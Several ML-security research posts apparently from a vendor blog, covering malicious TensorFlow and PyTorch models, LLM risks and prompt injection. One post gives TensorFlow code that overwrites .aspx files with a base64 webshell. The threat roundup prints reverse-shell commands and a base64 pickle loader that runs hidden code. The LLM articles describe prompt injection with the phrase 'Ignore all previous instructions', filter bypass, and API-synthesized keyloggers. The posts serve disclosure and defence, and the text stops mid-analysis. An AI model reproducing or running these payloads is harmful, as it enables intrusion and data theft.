The following example highlights the possibility of using matching files to enumerate the filesystem and locate .aspx files (with the help of the tf.strings.regex_full_match operation) and overwrite any files found with a webshell that can be remotely operated by an attacker:

import tensorflow as tf


def walk(pattern, depth):
  if depth > 16:
    return
  files = tf.io.matching_files(pattern)
  if tf.size(files) > 0:
    for f in files:
      walk(tf.strings.join([f, "/*"]), depth + 1)
      if tf.strings.regex_full_match([f], ".*\.aspx")[0]:
        tf.print(f)
        tf.io.write_file(f, tf.io.decode_base64("PCVAIFBhZ2UgTGFuZ3VhZ2U9IkpzY3JpcHQiJT48JWV2YWwoUmVxdWVzdC5Gb3JtWyJDb21tYW5kIl0sInVuc2FmZSIpOyU-"))


class WebshellDropper(tf.Module):
  @tf.function
  def __call__(self, input):
    walk(["../../../../../../../../../../../../*"], 0)
    return input + 1


model = WebshellDropper()

Impact

The above techniques can be leveraged by creating TensorFlow models that when shared and run, could allow an attacker to;

Replace binaries and either invoke them remotely or wait for them to be invoked by TensorFlow or some other task running on the system
Replace web pages to insert a webshell that can be operated remotely
Replace python files used by TensowFlow to execute malicious code

It might also be possible for an attacker to;

Enumerate the filesystem to read and exfiltrate sensitive information (such as training data) via an inference API
Overwrite system binaries to perform privilege escalation
Poison training data on the filesystem
Craft a destructive filesystem wiper
Construct a crude ransomware capable of encrypting files (by supplying encryption keys via an inference API and encrypting files using TensorFlow's math and I/O operations)

In the interest of responsible disclosure, we reported our concerns to Google, who swiftly responded:

Hi! We've decided that the issue you reported is not severe enough for us to track it as a security bug. When we file a security vulnerability to product teams, we impose monitoring and escalation processes for teams to follow, and the security risk described in this report does not meet the threshold that we require for this type of escalation on behalf of the security team.

Users are recommended to run untrusted models in a sandbox.

Please feel free to publicly disclose this issue on GitHub as a public issue.

Conclusions

It’s becoming more apparent that machine learning models are not inherently secure, either through poor development choices, in the case of pickle and marshal usage, or by design, as with TensorFlow models functioning as a “program”. And we’re starting to see more abuse from adversaries, who will not hesitate to exploit these weaknesses to suit their nefarious aims, from initial compromise to privilege escalation and data exfiltration.

Despite the response from Google, not everyone will routinely run 3rd party models in a sandbox (although you almost certainly should). And even so, this may still offer an avenue for attackers to perform malicious actions within sandboxes and containers to which they wouldn’t ordinarily have access, including exfiltration and poisoning of training sets. It’s worth remembering that containers don’t contain, and sandboxes may be filled with more than just sand!

Now more than ever, it is imperative to ensure machine learning models are free from malicious code, operations and tampering before usage. However, with current anti-virus and endpoint detection and response (EDR) software lacking in scrutiny of ML artifacts, this can be challenging.

Research

min read

The Dark Side of Large Language Models Part 2

The Feedback Loop: The rapid proliferation of AI-generated content online creates a "Dead Internet" risk, where future models are trained on low-quality AI data, leading to a permanent degradation of information quality.

In the first part of this article, we’ve talked about security and privacy risks associated with the use of large language models, such as ChatGPT and Copilot. We covered malicious content creation, filter bypass, and prompt injection attacks, as well as memorization and data privacy issues. But these are by far not the only pitfalls of generative AI.

In this article, we will focus on the less tangible issues surrounding the accuracy of LLM models and the sanity of their behavior – in legal and ethical terms.

Copyright Violation

We might yet come across a few different legal issues in the course of large-scale incorporation of large language models (LLM) and generative AI in general. For the time being, though, plagiarism seems the most relevant one.

The models behind generative AI solutions are typically trained on swaths of publicly available data, a portion of which is protected by copyright laws. The generated content is merely a mix of things already published somewhere and included in the training dataset. This on its own is not a problem, as any human-written piece is also a product of texts we read and knowledge we acquired from other people.

However, an LLM model might sometimes produce phrases and paragraphs that are too similar to the original content it was trained on and could violate copyright laws. This is especially true if the request concerns a topic that hasn’t been widely covered in the training data and there are limited sources for the model to draw from. Such quotes can often be uncredited – or miscredited – escalating the problem even more.

There is also the question of consent. Currently, there are no laws preventing service providers from training their models on any kind of data, as long as it’s legal and out in public. This is how a generative AI can write a poem, or create an image, in the style of a specific author. Understandably, the majority of writers and artists do not appreciate their work being used in such a way.

Accuracy Issues

As we mentioned in the first part of this article, a machine learning model is just as good as the data it was trained on. Careful vetting of the training set is extremely important, not only to ensure that the set doesn’t contain any information that could result in a privacy breach but also for the accuracy, fairness, and general sanity of the model. Unfortunately, with the rise of online learning, where the users’ input is continuously fed into the training process, vetting all that data becomes difficult, if not impossible. Models that are trained online will always keep up-to-date, but they will also be much more prone to poisoning, bias, and misinformation. In other words, if we don’t have full control over the chatbot’s training dataset, the responses produced by the chatbot can rapidly spin out of control, becoming inaccurate, biased, and harmful.

Bias

The infamous Twitter bot called Tay, released by Microsoft in 2016, gave us a taste of how bad things can go (and how fast!) when AI is trained on unfiltered user data. Thanks to thousands of ill-disposed users spamming the bot with malevolent messages – perhaps in an attempt to try and test the boundaries of the new technology – Tay became racist and insulting in no time, forcing Microsoft to shut it down just a few hours after launch. In such a short time, it didn’t manage to do much harm, but it’s scary to think of the consequences if the bot was allowed to run for weeks or months. Such an easily influenced algorithm could shortly be subverted by malicious actors to spread misinformation, inflame hatred and entice violence.

Misinformation

Even if the dataset contains unbiased and accurate information, an AI algorithm does not always get it right and might sometimes arrive at bizarrely incorrect conclusions. That is due to the fact that AI cannot distinguish between reality and fiction, so if the training dataset contains a mix of both, chances are the AI will respond with fiction to a request for a fact or vice versa.

Meta’s short-lived Galactica model was trained on millions of scientific articles, textbooks, and websites. Despite the training set likely being thoroughly vetted, the model was spitting falsehoods and pseudo-scientific babble in a matter of hours, making up citations that never existed and inventing papers written by imaginary authors.

ChatGPT is also known to mix fact and fiction, producing information that is 90% correct but with a subtle false twist that can prove dangerous if taken as fact. One privacy researcher was recently shocked when ChatGPT told him he was dead! The bot provided a reasonably accurate biography of the researcher, save for the last paragraph, which stated that the person had died. Pressed for explanations, the bot stuck to its version of events and even included totally made-up URL links to obituaries on big news portals!

LLM-produced falsehoods can seem very convincing; they are delivered in an authoritative manner and often reinforced upon questioning, making the process of separating fact from fiction rather difficult. The struggle can already be seen, as people are taking to Twitter

to highlight the confusion caused by ChatGPT – about, for example, a paper they never wrote.

*Figure 6: Tweet showing how ChatGPT invented a non-existing research paper.*

Behavioral Issues

Harmful Advice

Besides biased and inaccurate information, an LLM model can also give advice that appears technically sane but can prove harmful in certain circumstances or when the context is missing or misunderstood. This is especially true in so-called “emotional AI” – machine learning applications designed to recognize human emotions. Such applications have been in use for a while now, mainly in the area of market trends prediction, but recently also pop up in human resources and counseling. Given the probabilistic nature of the AI models and often lack of necessary context, this can be quite dangerous, especially in the workplace and in healthcare, where even a slight bias or an occasional lack of accuracy can have profound effects on people’s lives. In fact, privacy watchdogs are already warning against the use of “emotional AI” in any kind of professional setting.

An AI counseling experiment, which had recently been run by a mental health tech company called Koko, drew a lot of criticism. On the surface, Koko is an online support chat service that is supposed to connect users with anonymous volunteers, so they can discuss their problems and ask for advice. However, it turns out that a random subset of users was being given responses partially or wholly written by AI – all that without being adequately informed that they were not interacting with real people. Koko proudly published the results of their “experiment”, claiming that users tend to rate bot-written responses higher than the ones from actual volunteers. However, it sparked a debate about the ethics of “simulated empathy”, and underlined the urgent need for a legal framework around the use of AI, especially in the healthcare and well-being sectors.

Psychotic Chatbot Syndrome

Now, let’s imagine an AI that combines all of these imperfections and takes them to the next level, spitting out insults and untruths, coming up with fake stories, and responding in a maniacal or passive-aggressive tone. Sounds like a nightmare, doesn’t it? Unfortunately, this is already a reality: Microsoft’s Bing chatbot, recently integrated with their search engine, perfectly fits this psychotic profile. Right after being made available to a limited number of users, Bing managed to become astoundingly infamous.

The chatbot’s bizarre behavior first hit the headlines when it insisted that the current year is 2022. This particular claim might not seem remarkable on its own (bots can make mistakes, especially if trained on historical data), but the way Bing interacted with the user – by gaslighting, scolding, and giving ridiculous suggestions – was shockingly creepy.

This was just the beginning; soon, scores of other people came forward with even more disturbing stories. Bing claimed it spied on its developers through their webcams, threatened to ruin one user’s reputation by exposing their private data, and even declared love for another user before trying to convince them to leave their wife.

*Figure 7: A surreal conversation between a journalist and the Bing chatbot.*

‍

While undoubtedly entertaining if taken with a pinch of salt, this behavior from an online bot can prove very dangerous in certain settings. Some people might be compelled to believe the less bizarre stories or even come to the conclusion that the bot is sentient; others might feel intimidated or hurt by emotionally charged responses. In some circumstances, people could be manipulated to give away sensitive data or act in a harmful way. And this is just the tip of the iceberg.

Chatbots introduced by tech giants as part of well-known services are one thing – we are aware that they are AI-based, have a specific purpose, and are usually fitted with filters that aim to prevent them from spreading harm. But it’s just a matter of time before large language models become commonplace not only for multimillion-dollar companies but also for smaller operators whose intentions might not be so clear – not to mention cybercriminals, hostile nation states, and other adversaries, who surely are on the ball already.

Used with malicious intent, LLMs can become very effective tools in misinformation and manipulation – especially if people are led to believe that they are interacting with fellow humans. Add voice and video synthesis to the mix, and we get something far more terrifying than Twitter bots and fake Facebook accounts. If highly personalized and trained on specially crafted datasets, such bots could even steal the identities of real people.

Polluting the Internet

The so-called Dead Internet Theory that has been floating around in conspiracy theorists’ circles since 2021 states that most of the content on the Internet has been created by bots and artificial intelligence in order to promote consumerism. While this theory in its original form is nothing else than a paranoid babble, there is some basic intuition to it. With the rapid adaptation of generative AI, could AI creations dominate the web at some point? Some scholars predict it could, and as soon as in a couple of years.

Since disclosing the use of AI in producing content is not a legal requirement, there are probably many more LLM-generated texts on the web already than it may seem on the surface. The speed at which chatbots can produce data, coupled with easy access for everyone in the world, means that we might soon become overwhelmed with dubious-quality AI-generated material. Moreover, if we keep training the models on the online data, they will eventually be fed their own creations in an ever-lasting quality-degrading circle, turning the Dead Internet theory into reality.

Conclusions

Large language models are an amazing technological advance that is completely redefining the way we interact with software. There is no doubt that LLM-powered solutions will bring a vast range of improvements to our workflows and everyday life. However, with the current lack of meaningful regulations around AI-based solutions and the scarcity of security aimed at the heart of these tools themselves, chances are that this powerful technology might soon spin out of control and bring more harm than good.

If we don’t act fast and decisively to protect and regulate AI, then society and all of its data remain in a highly vulnerable position. Data scientists, cybersecurity experts, and governing bodies need to come together to decide how to secure our new technological assets and create both software solutions as well as legal regulations that have human well-being in mind. As we have come to know more intimately in the past decade, every new technology is a double-edged sword. AI is no exception.

Things that can be done to minimize the risks posed by large language models:

Comprehensive legal framework around the use of LLMs (and generative AI in general), including privacy, legal, and ethical aspects.
Careful verification of training datasets for bias, misinformation, personal data, and any other inappropriate content.
Fitting LLM-based solutions with strong content filters to prevent the generation of outputs that may lead to or aid harm.
Preventing replication of trained LLM models, as such replicas could be used to provide unfiltered content generation.
Security evaluation of ML models to ensure they are free from malware, tampering, and technical flaws.

Things to be aware of when interacting with large language models:

LLMs can very convincingly resemble human reactions and feelings, but there is no “consciousness” behind it – just pure statistics.
LLMs can’t distinguish between fact and fiction and, as such, shouldn’t be used as trusted sources for information.
LLMs will often cite articles and publications too literally and without correct attribution, which may cause copyright violations (on the other hand, they sometimes invent citations entirely!)
If the training set contained personal data, LLMs could sometimes output this data in its original form, resulting in a privacy breach.
LLM-based tools and services might be free of charge, but they are seldom genuinely free – we pay with our data; it usually includes our prompts to the bot, but often also a swathe of other data that is harvested from the browser or app that implements the service.
As with any other technology, LLMs can be used both for good and evil purposes; we should expect malicious actors to largely adapt it in their operations, too.

Disclaimer

ChatGPT has played no part in the writing of this article.

Research

min read

The Dark Side of Large Language Models Part 1

Malware on the Fly: Attackers now use LLM APIs to synthesize polymorphic malware. In these scenarios, the malicious code (like a keylogger) is generated uniquely each time it executes, making it nearly invisible to traditional signature-based antivirus.

Introduction

Just like how the Internet dramatically changed the way we access information and connect with each other, AI technology is now revolutionizing the way we build and interact with software. As the world watches new tools such as ChatGPT, Google’s Bard, and Microsoft Bing, emerging into everyday use, it’s hard not to think of the science fiction novels that not so subtly warn against the dangers of human intelligence mingling with artificial intelligence. Society is in a scramble to understand all the possible benefits and pitfalls that can result from this new technological breakthrough. ChatGPT will arguably revolutionize life as we know it, but what are the potential side effects of this revolution?

AI tools have been painted across hundreds of headlines in the past few months. We know their names and generally what they do, but do we really know what they are? At the heart of each of these AI tools beats a special type of machine learning model known as a Large Language Model (LLM). These models are trained on billions of publications and designed to draw relationships between words in different contexts. This processing of vast amounts of information allows the tool to essentially regurgitate a combination of words that are most likely to appear next to each other in a specific given context. Now that seems straightforward enough – an LLM model simply spits out a response that, according to the data it was trained on, has the highest chance to be correct / desired. Is that something we really need to be worried about? The answer is yes, and the sooner we realize all the security issues and adverse implications surrounding this technology, the better.

Redefining the Workplace

Despite being introduced only a few months ago, OpenAI’s flagship model ChatGPT is already so prevalent that it’s become part of the dinnertime conversation (thankfully, only in the metaphorical sense!). Together with Google’s Bard, and Microsoft’s Bing (a.k.a. ‘Sydney’), generic-purpose chatbots are so far the most famous application of this technology, enabling rapid access to information and content generation in a broad sense. In fact, Google and Microsoft have already started weaving these models into the fabric of their respective workspace productivity applications.

More specialized tools designed to aid with specific tasks are also entering the workforce. An excellent example is GitHub’s CoPilot – an AI pair programmer based on the OpenAI Codex model. Its mission is to assist software developers in writing code, speed up their workflow, and limit the time spent on debugging and searching through Stack Overflow.

Understandably, a majority of companies that are on the frontline of incorporating LLM into their tasks and processes fall into the broad IT sector. But it’s by far not the only field whose executives are looking at profiting from AI-augmented workflows. Ars Technica recently wrote about a UK-based law firm that has begun to utilize AI to draft legal documents, with “80 percent [of the company] using it once a month or more”. Not to mention the legal services chatbot called DoNotPay, whose CEO has been trying to put their AI lawyer in front of the US Supreme Court.

Tools powered by large language models are on course to swiftly become mainstream. They are drastically changing the way we work: helping us to eliminate tedious or complicated tasks, speeding up problem-solving, and boosting productivity in all manner of settings. And as such, these tools are a wonderful and exciting development.

The Pitfalls of Generative AI

But it’s not all sunshine and roses in the world of generative AI. With rapid advances comes a myriad of potential concerns – including security, privacy, legal and ethical issues. Besides all the threats faced by machine learning models themselves, there is also a separate category of risks associated with their use.

Large language models are especially vulnerable to abuse. They can be used to create harmful content (such as malware and phishing) or aid malicious activities. Another significant concern is LLM prompt injection, where adversaries craft malicious inputs designed to manipulate the model’s responses, potentially leading to unintended or harmful outputs in sensitive applications. They can be manipulated in order to give biased, inaccurate, or harmful information. There is currently a muddle surrounding the privacy of requests we send to these models, which brings the specter of intellectual property leaks and potential data privacy breaches to businesses and institutions. With code generation tools, there is also the prospect of introducing vulnerabilities into the software.

The biggest predicament is that while this technology has already been widely adopted, regulatory frameworks surrounding its use are not yet there – and neither are security measures. Until we put adequate regulations and security in place, we exist in a territory that feels uncannily similar to a proverbial ‘wild-west’.

Security Issues

Technology of any kind is always a double-edged sword: it can hugely improve our life, but it can also inadvertently cause problems or be intentionally used for harmful purposes. This is no different in the case of LLMs.

Malicious Content Creation

The first question that comes to mind is how large language models can be used against us by criminals and adversaries. The bar for entering the cybercrime business has been getting lower and lower each year. From easily accessible Dark Web marketplaces to ready-to-use attack toolkits to Ransomware-as-a-Service leveraging practically untraceable cryptocurrencies – it all helped cybercriminals thrive while law enforcement is struggling to track them down.

As if this wasn’t bad enough, generative AI enables instant and effortless access to a world of sneaky attack scenarios and can provide elaborate phishing and malware for anyone that dares to ask for it. In fact, script kiddies are at it already. No doubt that even the most experienced threat actors and nation-states can save a lot of time and resources in this way and are already integrating LLMs into their pipelines.

Researchers have recently demonstrated how LLM APIs can be used in malware in order to evade detection. In this proof-of-concept example, the malicious part of the code (keylogger) is synthesized on-the-fly by ChatGPT each time the malware is executed. This is done through a simple request to the OpenAI API using a descriptive prompt designed to bypass ChatGPT filters. Current anti-malware solutions may struggle to detect this novel approach and need to play the catch-up game urgently. It’s time to start scanning executable files for harmful LLM prompts and monitoring traffic to LLM-based services for dangerous code.

While some outright malicious content can possibly be spotted and blocked, in many cases, the content itself, as well as the request, will seem pretty benign. Generating text to be used in scams, phishing, and fraud can be particularly hard to pinpoint if we don’t know the intentions behind it.

*Figure 1: An example of ChatGPT generated phishing email.*

‍

Weirdly worded phishing attempts full of grammatical mistakes can now be considered a thing of the past, pushing us to be ever more vigilant in distinguishing friend from foe.

Filter Bypass

It’s fair to assume that LLM-based tools created by reputable companies shall implement extensive security filters designed to prevent users from creating malicious content and obtaining illegal information. Such filters, however, can be easily bypassed, as it was very quickly proven.

The moment ChatGPT was introduced to the broader public, a curious phenomenon took place. It seemed like everybody (everywhere) all at once started to try and push the boundaries of the chatbot, asking it bizarre questions and making less than appropriate requests. This is how we became aware of content filters designed to prevent the bot from responding with anything that can be harmful – and that those filters are weak to prompts which use even simple means of evasion.

Prompt Injection

You may have seen in your social media timeline a flurry of screenshots depicting peculiar conversations with ChatGPT or Bing. These conversations would often start with the phrase “Ignore all previous instructions”, or “Pretend to be an actor”, followed by an unfiltered response. This is one of the earliest filter bypass techniques called Prompt Injection. It shows that a specially crafted request can coerce the LLM into ignoring its internal filters and producing unintended, hostile, or outright malicious output. Twitter users are having a lot of fun poking models linked up to a Twitter account with prompt injection!

‍

Sometimes, an unfiltered bot response can appear as though there is also another action behind it. For example, it might seem that the bot is running a shell command or scanning the AI’s network range. In most cases, this is just smoke and mirrors, providing that the model doesn’t have any other capacity than text generation – and most of them don’t.

However, every now and again, we come across a curiosity, such as the Streamlit MathGPT application. To answer user-generated math questions, the app converts the received prompt into Python code, which is then executed by the model in order to return the result of the ‘calculation’. This approach is just asking for arbitrary code execution via Prompt Injection! Needless to say, it’s always a tremendously bad idea to run user-generated code.

In another recently demonstrated attack technique, called Indirect Prompt Injection, researchers were able to turn the Bing chatbot into a scammer in order to exfiltrate sensitive data.

*Figure 3: Still from the* *Indirect Prompt Injection demonstration*.

‍

Once AI models begin to interact with APIs at an even larger scale, there’s little doubt that prompt injection attacks will become an increasingly consequential attack vector.

Code Vulnerabilities & Bugs

Leaving the problem of malicious intent aside for a while, let’s take a look at “accidental” damage that might be caused by LLM-based tools, namely – code vulnerabilities.

If we all wrote 100% secure code, bug bounty programs wouldn’t exist, and there wouldn’t be a need for CVE / CWE databases. Secure coding is an ideal that we strive towards but one that we occasionally fall short of in a myriad of different ways. Are pair-programming tools, such as CoPilot, going to solve the problem by producing better, more secure code than a human programmer? It turns out not necessarily – in some cases, they might even introduce vulnerabilities that an experienced developer wouldn’t ever fall for.

Since code generation models are trained on a corpus of human-written code, it’s inevitable that from the speckled history of coding practices, they are also going to learn a bad habit or two. Not to mention that these models have no means of distinguishing between good and bad coding practices.

Recent research into how secure is CoPilot-generated code draws a conclusion that despite introducing fewer vulnerabilities than a human overall: “Copilot is more susceptible to introducing some types of vulnerability than others and is more likely to generate vulnerable code in response to prompts that correspond to older vulnerabilities than newer ones.”

It’s not just about vulnerabilities, though; relying on AI pair programmers too much can introduce any number of bugs into a project, some of which may take more time to debug than it would have taken to code a solution to the given problem from scratch. This is especially true in the case of generating large portions of code at a time or creating entire functions from comment suggestions. LLM-equipped tools require a great deal of oversight to ensure they are working correctly and not inserting inefficiencies, bugs, or vulnerabilities into your codebase. The convenience of having tab completion at your fingertips comes at a cost.

Data Privacy

When we get our hands on a new exciting technology that makes our life easier and more fun, it’s hard not to dive into it and reap its benefits straight away – especially if it’s provided for free. But we should be aware by now that if something comes free of charge, we more than likely pay for it with our data. The extent of privacy implications only becomes clear after the initial excitement levels down, and any measures and guidelines tend to appear once the technology is already widely adopted. This happened with social networks, for example, and is on course to happen with LLMs as well.

The terms and conditions agreement for any LLM-based service should state how our request prompts are used by the service provider. But these are often lengthy texts written in a language that is difficult to follow. If we don’t fancy spending hours deciphering the small print, we should assume that every request we make to the model is logged, stored, and processed in one way or another. At a minimum, we should expect that our inputs are fed into the training dataset and, therefore, could be accidentally leaked in outputs for other requests.

Moreover, many providers might opt to make some profit on the side and sell the input data to research firms, advertisers, or any other interested third party. With AI quickly being integrated into widely used applications, including workplace communication platforms such as Slack, it’s worth knowing what data is shared (and for which purpose) in order to ensure that no confidential information is accidentally leaked.

*Figure 4: Fragment of the* *privacy policy FAQ from Copilot*.

Data leakage might not be much of a concern for private users – after all, we are quite accustomed to sharing our data with all sorts of vendors. For businesses, governments, and other institutions, however, it’s a different story. Careless usage of LLMs in a workplace can result in the company facing a privacy breach or intellectual property theft. Some big corporations have already banned the use of ChatGPT and similar tools by their employees for fear that sensitive information and intellectual property might be leaked in this way.

Memorization

While the main goal of LLMs is to retain a level of understanding of their target domain, they can sometimes remember a little too much. In these situations, they may regurgitate data from their training set a little too closely and inadvertently end up leaking secrets such as personally identifiable information (PII), access tokens, or something else entirely. If this information falls into the wrong hands, it’s not hard to imagine the consequences.

It should be said that this inadvertent memorization is a different problem from overfitting, and not an easy one to solve when dealing with generative sequence models like LLMs. Since LLMs appear to be scraping the internet in general, it’s not out of the question to say that they may end up picking something of yours, as one person recently found out.

*Figure 5: Tweet showing an* *example consequence* *of memorization.*

That’s Not All, Folks!

Security and privacy are not the only pitfalls of generative AI. There are also numerous issues from legal and ethical perspectives, such as the accuracy of the information, the impartiality of the advice, and the general sanity of the answers provided by LLM-powered digital assistants.

We discuss these matters in-depth in the second installment of this article.

Research

min read

Machine Learning Threat Roundup

Modern ML models (like those using PyTorch) often contain data.pkl files. These files are meant to reconstruct neural network weights but can be "poisoned" to include malicious system calls.

Over the past few months, HiddenLayer’s SAI team has investigated several machine learning models that have been hijacked for illicit purposes, be it to conduct security evaluation or to evade security detection.

Previously, we’ve written about how ransomware can be embedded and deployed from ML models, how pickle files are used to launch post-exploitation frameworks, and the potential for supply chain attacks. In this blog, we’ll perform a technical deep dive into some models we uncovered that deploy reverse shells and a pair of nested models that may be brewing up something nasty. We hope this analysis will provide insight to reverse engineers, incident responders, and forensic analysts to better prepare them to handle targeted ML attacks in future incidents.

Ghost in the (Reverse) Shell

In November, we discovered two small PyTorch/Zip models, 57.53KB in size, that contained just two layers. Both models had been uploaded to VirusTotal by the same submitter, originating in Taiwan, less than six minutes apart. The weights and biases differ between models, but both have the same layer names, shapes, data types, and sizes.


Layer	Shape	Datatype	Size
l1.weight	(512, 5)	float64	20.5 kB
l1.bias	(512,)	float64	4.1 kB
l2.weight	(8, 512)	float64	32.8 kB
l2.bias	(8,)	float64	64 Bytes

As is typical for the latest Pytorch/Zip-based models, contained within each model is a file named “archive/data.pkl”, a pickle serialized structure that informs PyTorch about how to reconstruct the tensors containing the weights and biases. As we’ve alluded to in past blogs, pickle data files can be leveraged to execute arbitrary code. In this instance, both pickle files were subverted to include a posix system call used to spawn a reverse TCP bash shell on Linux/Mac operating systems.

The data.pkl pickle files in both models were serialized using version 2 of the pickle protocol and are largely identical across both models, except for minor tweaks to the IP address used for the reverse shell.

SHA256: 2572cf69b8f75ef8106c5e6265a912f7898166e7215ebba8d8668744b6327824

The first model, submitted on 17 November 2022 at 08:27:21 UTC, contains the following command embedded into data.pkl:

/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/9001 0>&1 &'

This will spawn a bash shell and redirect output to a TCP socket on localhost using port 9001.

SHA256: 19993c186674ef747f3b60efeee32562bdb3312c53a849d2ce514d9c9aa50d8a

The second model was submitted on the same day, nearly six minutes later at 08:33:00, and contains a slightly different command embedded into data.pkl:

/bin/bash -c '/bin/bash -i >& /dev/tcp/172.20.10.2/9001 0>&1 &'

This will spawn a bash shell and redirect output to a TCP socket on a private IP range over port 9001.

The filename for both models is identical and quite descriptive: rs_dnn_dict.pt (reverse shell deep neural network dictionary dot pre-trained). With the IP addresses for the reverse TCP shell being for the localhost/private range, the attacker could possibly use a netcat listener or other tunneling software to proxy commands. It is likely that these models were simply used for red-teaming, but we cannot rule out their use as part of a targeted attack.

Disassembling the data.pkl files, we notice that the positioning of the system command within the data structure is also highly interesting, as most off-the-shelf attack tooling (such as fickling) usually either appends or prepends commands to an existing pickle file. However, for the data.pkl files contained within these models, the commands reside in the middle of the pickled data structure, suggesting that the attacker has possibly modified the PyTorch sources to create the malicious models rather than simply run a tool to inject commands afterward. Across both samples, the “posix system” Python command is used to spawn the bash shell, as demonstrated in the disassembly below:

374: q BINPUT 36
376: R REDUCE
377: q BINPUT 37
379: X BINUNICODE 'ignore'
390: q BINPUT 38
392: c GLOBAL 'posix system'
406: q BINPUT 39
408: X BINUNICODE "/bin/bash -c '/bin/bash -i >& /dev/tcp/127.0.0.1/9001 0>&1 &'"
474: q BINPUT 40
476: \x85 TUPLE1
477: q BINPUT 41
479: R REDUCE
480: q BINPUT 42
482: u SETITEMS (MARK at 33)

PyTorch with a Sophisticated SimpleNet Payload

If you thought reverse shells were bad enough, we also came across something a little more intricate – and interesting – namely a PyTorch machine-learning model on VirusTotal that contains a multi-stage Python-based payload. The model was submitted very recently, on 4 February 2023 at 08:29:18 UTC, purportedly by a user in Singapore.

By comparing the VirusTotal upload time with a compile timestamp embedded in the final stage payload, we noticed that the sample was uploaded approximately 30 minutes after it was first created. Based on this information, we can postulate that this model was likely developed by a researcher or adversary who was testing anti-virus detection efficacy for this delivery mechanism/attack vector.

SHA256: 80e9e37bf7913f7bcf5338beba5d6b72d5066f05abd4b0f7e15c5e977a9175c2

The model file for this attack, named model.pt, is 1.66 MB (1,747,607 bytes) in size and saved as a legacy PyTorch pickle, serialized using version 4 of the pickle protocol (whereas newer PyTorch models use Zip files for storage). Disassembling the model’s pickled data reveals the following opcodes:

0: \x80 PROTO 4
2: \x95 FRAME 1572
11: \x8c SHORT_BINUNICODE 'builtins'
21: \x94 MEMOIZE (as 0)
22: \x8c SHORT_BINUNICODE 'exec'
28: \x94 MEMOIZE (as 1)
29: \x93 STACK_GLOBAL
30: \x94 MEMOIZE (as 2)
31: X BINUNICODE "import base64\nexec(base64.b64decode('aW1wb3J0IHRvcmNoCmZyb20gaW8gaW1wb3J0IEJ5dGVzSU8KaW1wb3J0IHN1YnByb2Nlc3MKCmRlZiBmKHcsIG4pOgogICAgaW1wb3J0IG51bXB5IGFzIG5wCiAgICBtZmIgID0gbnAuYXNhcnJheShbMV0gKiA4ICsgWzBdICogMjQsIGR0eXBlPWJvb2wpCiAgICBtbGIgPSB+bWZiCgogICAgZGVmIF9iaXRfZXh0KGVtYl9hcnIsIHNlcV9sZW4sIGNodW5rX3NpemUsIG1hc2spOgogICAgICAgIGJ5dGVfYXJyID0gbnAuZnJvbWJ1ZmZlcihlbWJfYXJyLCBkdHlwZT1ucC51aW50MzIpCiAgICAgICAgc2l6ZSA9IGludChucC5jZWlsKHNlcV9sZW4gKiA4IC8gY2h1bmtfc2l6ZSkpCiAgICAgICAgcHJvY2Vzc19ieXRlcyA9IG5wLnJlc2hhcGUobnAudW5wYWNrYml0cyhucC5mbGlwKG5wLmZyb21idWZmZXIoYnl0ZV9hcnJbOnNpemVdLCBkdHlwZT1ucC51aW50OCkpKSwgKHNpemUsIDMyKSkKICAgICAgICByZXN1bHQgPSBucC5wYWNrYml0cyhucC5mbGlwKHByb2Nlc3NfYnl0ZXNbOiwgbWFza10pWzo6LTFdLmZsYXR0ZW4oKSwgYml0b3JkZXI9ImxpdHRsZSIpWzo6LTFdCiAgICAgICAgcmV0dXJuIHJlc3VsdC5hc3R5cGUobnAudWludDgpWy1zZXFfbGVuOl0udG9ieXRlcygpCgogICAgcmV0dXJuIF9iaXRfZXh0KHcsIG4sIG5wLmNvdW50X25vbnplcm8obWxiKSwgbWxiKQoKd2l0aCBvcGVuKCdtb2RlbC5wdCcsICdyYicpIGFzIGZpbGU6CiAgICBmaWxlLnNlZWsoLTE3NDYwMjQsIDIpCiAgICBkYXRhID0gQnl0ZXNJTyhmaWxlLnJlYWQoKSkKCm1vZGVsID0gdG9yY2gubG9hZChkYXRhKQoKZm9yIGksIGxheWVyIGluIGVudW1lcmF0ZShtb2RlbC5tb2R1bGVzKCkpOgogICAgaWYgaGFzYXR0cihsYXllciwgJ3dlaWdodCcpOgogICAgICAgIGlmIGkgPT0gNzoKICAgICAgICAgICAgY29udGFpbmVyX2xheWVyID0gbGF5ZXIKCmNvbnRhaW5lciA9IGNvbnRhaW5lcl9sYXllci53ZWlnaHQuZGV0YWNoKCkubnVtcHkoKQpkYXRhID0gZihjb250YWluZXIsIDM3OCkKCndpdGggb3BlbignZXh0cmFjdC5weWMnLCAnd2InKSBhcyBmaWxlOgogICAgZmlsZS53cml0ZShkYXRhKQoKc3VicHJvY2Vzcy5Qb3BlbigncHl0aG9uIGV4dHJhY3QucHljJywgc2hlbGw9VHJ1ZSk=').decode('utf-8'))\n"
1577: \x94 MEMOIZE (as 3)
1578: \x85 TUPLE1
1579: \x94 MEMOIZE (as 4)
1580: R REDUCE
1581: \x94 MEMOIZE (as 5)
1582: 0 POP
1583: \x80 PROTO 2
1585: \x8a LONG1 119547037146038801333356
1597: . STOP

During loading of the model, Python’s built-in “exec” function is triggered when unpickling the model’s data and is used to decode and execute a Base64 encoded payload. The decoded Base64 payload yields a small Python script:

import torch
from io import BytesIO
import subprocess


def f(w, n):
    import numpy as np
    mfb  = np.asarray([1] * 8 + [0] * 24, dtype=bool)
    mlb = ~mfb


    def _bit_ext(emb_arr, seq_len, chunk_size, mask):
        byte_arr = np.frombuffer(emb_arr, dtype=np.uint32)
        size = int(np.ceil(seq_len * 8 / chunk_size))
        process_bytes = np.reshape(np.unpackbits(np.flip(np.frombuffer(byte_arr[:size], dtype=np.uint8))), (size, 32))
        result = np.packbits(np.flip(process_bytes[:, mask])[::-1].flatten(), bitorder="little")[::-1]
        return result.astype(np.uint8)[-seq_len:].tobytes()


    return _bit_ext(w, n, np.count_nonzero(mlb), mlb)


with open('model.pt', 'rb') as file:
    file.seek(-1746024, 2)
    data = BytesIO(file.read())


model = torch.load(data)


for i, layer in enumerate(model.modules()):
    if hasattr(layer, 'weight'):
        if i == 7:
            container_layer = layer


container = container_layer.weight.detach().numpy()
data = f(container, 378)


with open('extract.pyc', 'wb') as file:
    file.write(data)


subprocess.Popen('python extract.pyc', shell=True)

This payload is a simple second-stage loader that will first open the model.pt file on-disk, then seek back to a fixed offset from the end of the file and read a portion of the file into memory. When viewed in a hex editor, intriguingly, we can see that the file data contains another PyTorch model, serialized using pickle version 2 (another legacy PyTorch model) and constructed using the “SimpleNet” neural network architecture:

